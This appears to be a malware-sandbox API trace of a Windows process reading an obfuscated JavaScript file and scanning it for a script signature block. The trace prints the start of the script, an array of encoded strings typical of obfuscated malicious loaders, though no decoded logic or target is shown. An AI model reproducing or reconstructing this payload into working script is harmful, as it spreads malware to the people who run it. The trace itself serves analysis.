	[0119.711] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2a4f0, cbMultiByte=19304, lpWideCharStr=0x2fdfd0, cchWideChar=19432 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0119.711] realloc (_Block=0x2fdfd0, _Size=0x96d0) returned 0x2fdfd0
	[0119.711] ??2@YAPEAX_K@Z () returned 0x2f0b0
	[0119.712] free (_Block=0x2fdfd0) 
	[0119.712] ??3@YAXPEAX@Z () returned 0x461fe701
	[0119.712] ??3@YAXPEAX@Z () returned 0x461fe701
	[0119.712] ??3@YAXPEAX@Z () returned 0x461fe701
	[0119.712] ??3@YAXPEAX@Z () returned 0x461fe701
	[0119.712] ??3@YAXPEAX@Z () returned 0x461fe701
	[0119.712] ??3@YAXPEAX@Z () returned 0x461fe701
	[0119.712] CoUninitialize () 
	[0119.712] ??3@YAXPEAX@Z () returned 0x461fe701
	[0119.712] CloseHandle (hObject=0x140) returned 1
	[0119.713] wcsncmp (_String1="var dogoswoisosfhsdiefgssqda=['wq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0119.713] wcsncmp (_String1="ar dogoswoisosfhsdiefgssqda=['wqt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0119.713] wcsncmp (_String1="r dogoswoisosfhsdiefgssqda=['wqto", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0119.713] wcsncmp (_String1=" dogoswoisosfhsdiefgssqda=['wqtow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 19
	[0119.713] wcsncmp (_String1="dogoswoisosfhsdiefgssqda=['wqtowq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0119.713] wcsncmp (_String1="ogoswoisosfhsdiefgssqda=['wqtowqj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0119.713] wcsncmp (_String1="goswoisosfhsdiefgssqda=['wqtowqjC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0119.713] wcsncmp (_String1="oswoisosfhsdiefgssqda=['wqtowqjCl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0119.713] wcsncmp (_String1="swoisosfhsdiefgssqda=['wqtowqjClg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0119.713] wcsncmp (_String1="woisosfhsdiefgssqda=['wqtowqjClg=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0119.713] wcsncmp (_String1="oisosfhsdiefgssqda=['wqtowqjClg==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0119.713] wcsncmp (_String1="isosfhsdiefgssqda=['wqtowqjClg=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0119.713] wcsncmp (_String1="sosfhsdiefgssqda=['wqtowqjClg==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0119.713] wcsncmp (_String1="osfhsdiefgssqda=['wqtowqjClg==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0119.713] wcsncmp (_String1="sfhsdiefgssqda=['wqtowqjClg==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0119.713] wcsncmp (_String1="fhsdiefgssqda=['wqtowqjClg==','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0119.713] wcsncmp (_String1="hsdiefgssqda=['wqtowqjClg==','w5M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0119.713] wcsncmp (_String1="sdiefgssqda=['wqtowqjClg==','w5Mc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0119.713] wcsncmp (_String1="diefgssqda=['wqtowqjClg==','w5Mcw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0119.713] wcsncmp (_String1="iefgssqda=['wqtowqjClg==','w5Mcwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0119.713] wcsncmp (_String1="efgssqda=['wqtowqjClg==','w5Mcwr/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0119.713] wcsncmp (_String1="fgssqda=['wqtowqjClg==','w5Mcwr/D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0119.713] wcsncmp (_String1="gssqda=['wqtowqjClg==','w5Mcwr/Dv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0119.713] wcsncmp (_String1="ssqda=['wqtowqjClg==','w5Mcwr/Dvc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0119.713] wcsncmp (_String1="sqda=['wqtowqjClg==','w5Mcwr/DvcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0119.713] wcsncmp (_String1="qda=['wqtowqjClg==','w5Mcwr/DvcOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0119.713] wcsncmp (_String1="da=['wqtowqjClg==','w5Mcwr/DvcOsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0119.713] wcsncmp (_String1="a=['wqtowqjClg==','w5Mcwr/DvcOsK2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0119.713] wcsncmp (_String1="=['wqtowqjClg==','w5Mcwr/DvcOsK2c", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0119.713] wcsncmp (_String1="['wqtowqjClg==','w5Mcwr/DvcOsK2cu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 78
	[0119.713] wcsncmp (_String1="'wqtowqjClg==','w5Mcwr/DvcOsK2cuB", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0119.713] wcsncmp (_String1="wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0119.713] wcsncmp (_String1="qtowqjClg==','w5Mcwr/DvcOsK2cuBQ=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0119.713] wcsncmp (_String1="towqjClg==','w5Mcwr/DvcOsK2cuBQ==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0119.713] wcsncmp (_String1="owqjClg==','w5Mcwr/DvcOsK2cuBQ=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0119.713] wcsncmp (_String1="wqjClg==','w5Mcwr/DvcOsK2cuBQ==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0119.713] wcsncmp (_String1="qjClg==','w5Mcwr/DvcOsK2cuBQ==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0119.714] wcsncmp (_String1="jClg==','w5Mcwr/DvcOsK2cuBQ==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0119.714] wcsncmp (_String1="Clg==','w5Mcwr/DvcOsK2cuBQ==','wr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0119.714] wcsncmp (_String1="lg==','w5Mcwr/DvcOsK2cuBQ==','wrv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0119.714] wcsncmp (_String1="g==','w5Mcwr/DvcOsK2cuBQ==','wrvD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0119.714] wcsncmp (_String1="==','w5Mcwr/DvcOsK2cuBQ==','wrvDp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0119.714] wcsncmp (_String1="=','w5Mcwr/DvcOsK2cuBQ==','wrvDps", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0119.714] wcsncmp (_String1="','w5Mcwr/DvcOsK2cuBQ==','wrvDpsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0119.714] wcsncmp (_String1=",'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0119.714] wcsncmp (_String1="'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0119.714] wcsncmp (_String1="w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0119.714] wcsncmp (_String1="5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0119.714] wcsncmp (_String1="Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0119.714] wcsncmp (_String1="cwr/DvcOsK2cuBQ==','wrvDpsOqD8KNw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0119.714] wcsncmp (_String1="wr/DvcOsK2cuBQ==','wrvDpsOqD8KNwp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0119.714] wcsncmp (_String1="r/DvcOsK2cuBQ==','wrvDpsOqD8KNwpb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0119.714] wcsncmp (_String1="/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0119.714] wcsncmp (_String1="DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0119.714] wcsncmp (_String1="vcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0119.714] wcsncmp (_String1="cOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0119.714] wcsncmp (_String1="OsK2cuBQ==','wrvDpsOqD8KNwpbCjh8p", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0119.714] wcsncmp (_String1="sK2cuBQ==','wrvDpsOqD8KNwpbCjh8pa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0119.714] wcsncmp (_String1="K2cuBQ==','wrvDpsOqD8KNwpbCjh8pas", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0119.714] wcsncmp (_String1="2cuBQ==','wrvDpsOqD8KNwpbCjh8pasK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0119.714] wcsncmp (_String1="cuBQ==','wrvDpsOqD8KNwpbCjh8pasKg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0119.714] wcsncmp (_String1="uBQ==','wrvDpsOqD8KNwpbCjh8pasKgV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0119.714] wcsncmp (_String1="BQ==','wrvDpsOqD8KNwpbCjh8pasKgV8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 53
	[0119.714] wcsncmp (_String1="Q==','wrvDpsOqD8KNwpbCjh8pasKgV8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0119.714] wcsncmp (_String1="==','wrvDpsOqD8KNwpbCjh8pasKgV8Oz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0119.714] wcsncmp (_String1="=','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0119.714] wcsncmp (_String1="','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0119.714] wcsncmp (_String1=",'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1x", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0119.714] wcsncmp (_String1="'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0119.714] wcsncmp (_String1="wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0119.714] wcsncmp (_String1="rvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0119.714] wcsncmp (_String1="vDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7j", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0119.714] wcsncmp (_String1="DpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0119.714] wcsncmp (_String1="psOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0119.714] wcsncmp (_String1="sOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0119.715] wcsncmp (_String1="OqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0119.715] wcsncmp (_String1="qD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Ow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0119.715] wcsncmp (_String1="D8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Oww", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0119.715] wcsncmp (_String1="8KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0119.715] wcsncmp (_String1="KNwpbCjh8pasKgV8Ozb1xZw7jDu8Owwrt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0119.715] wcsncmp (_String1="NwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0119.715] wcsncmp (_String1="wpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0119.715] wcsncmp (_String1="pbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0119.715] wcsncmp (_String1="bCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0119.715] wcsncmp (_String1="Cjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0119.715] wcsncmp (_String1="jh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0119.715] wcsncmp (_String1="h8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0119.715] wcsncmp (_String1="8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0119.715] wcsncmp (_String1="pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0119.715] wcsncmp (_String1="asKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0119.715] wcsncmp (_String1="sKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0119.715] wcsncmp (_String1="KgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0X", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0119.715] wcsncmp (_String1="gV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0119.715] wcsncmp (_String1="V8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0119.715] wcsncmp (_String1="8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0119.715] wcsncmp (_String1="Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0119.715] wcsncmp (_String1="zb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0119.715] wcsncmp (_String1="b1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0119.715] wcsncmp (_String1="1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw6", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0119.715] wcsncmp (_String1="xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0119.715] wcsncmp (_String1="Zw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0119.715] wcsncmp (_String1="w7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0119.715] wcsncmp (_String1="7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0119.715] wcsncmp (_String1="jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0119.715] wcsncmp (_String1="Du8OwwrtSXDnDgMOwa0XCr8OAw69Dw79y", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0119.715] wcsncmp (_String1="u8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0119.715] wcsncmp (_String1="8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0119.715] wcsncmp (_String1="OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0119.715] wcsncmp (_String1="wwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0119.715] wcsncmp (_String1="wrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0119.715] wcsncmp (_String1="rtSXDnDgMOwa0XCr8OAw69Dw79yA8OW',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0119.715] wcsncmp (_String1="tSXDnDgMOwa0XCr8OAw69Dw79yA8OW','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0119.715] wcsncmp (_String1="SXDnDgMOwa0XCr8OAw69Dw79yA8OW','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 70
	[0119.716] wcsncmp (_String1="XDnDgMOwa0XCr8OAw69Dw79yA8OW','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0119.716] wcsncmp (_String1="DnDgMOwa0XCr8OAw69Dw79yA8OW','w5/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0119.716] wcsncmp (_String1="nDgMOwa0XCr8OAw69Dw79yA8OW','w5/C", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0119.716] wcsncmp (_String1="DgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0119.716] wcsncmp (_String1="gMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
